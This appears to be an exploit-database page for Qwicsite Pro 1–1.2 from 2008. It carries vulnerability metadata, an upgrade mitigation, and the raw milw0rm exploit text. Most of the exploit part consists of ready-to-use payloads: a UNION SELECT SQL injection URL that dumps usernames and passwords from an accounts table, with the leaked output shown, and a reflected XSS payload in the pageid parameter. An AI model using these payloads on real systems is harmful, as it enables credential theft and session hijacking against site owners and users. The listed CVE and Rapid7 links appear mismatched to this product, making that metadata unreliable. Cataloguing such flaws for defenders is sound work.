header-logo
Suggest Exploit
vendor:
Qwicsite Pro
by:
Cr@zy_King a.k.a t4cs1zkr4L
9.3
CVSS
HIGH
SQL/XSS
89
CWE
Product Name: Qwicsite Pro
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:qwicsite:qwicsite_pro
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities

Qwicsite Pro is prone to multiple vulnerabilities, including SQL injection and cross-site scripting. An attacker can exploit these issues to manipulate SQL queries, steal cookie-based authentication credentials, and launch other attacks.

Mitigation:

Upgrade to the latest version of Qwicsite Pro.
Source

Exploit-DB raw data:

By Cr@zy_King a.k.a t4cs1zkr4L


Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities


http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*


<!-- checkpageuser   - -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password) from
accounts/* -  - ::al3m::kinq -->


::Username::pass



http://localhost/?pageid=<script>alert("Cr@")</script>



www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]

# milw0rm.com [2008-09-04]

Navigation

Suggest Exploit

Services By CQR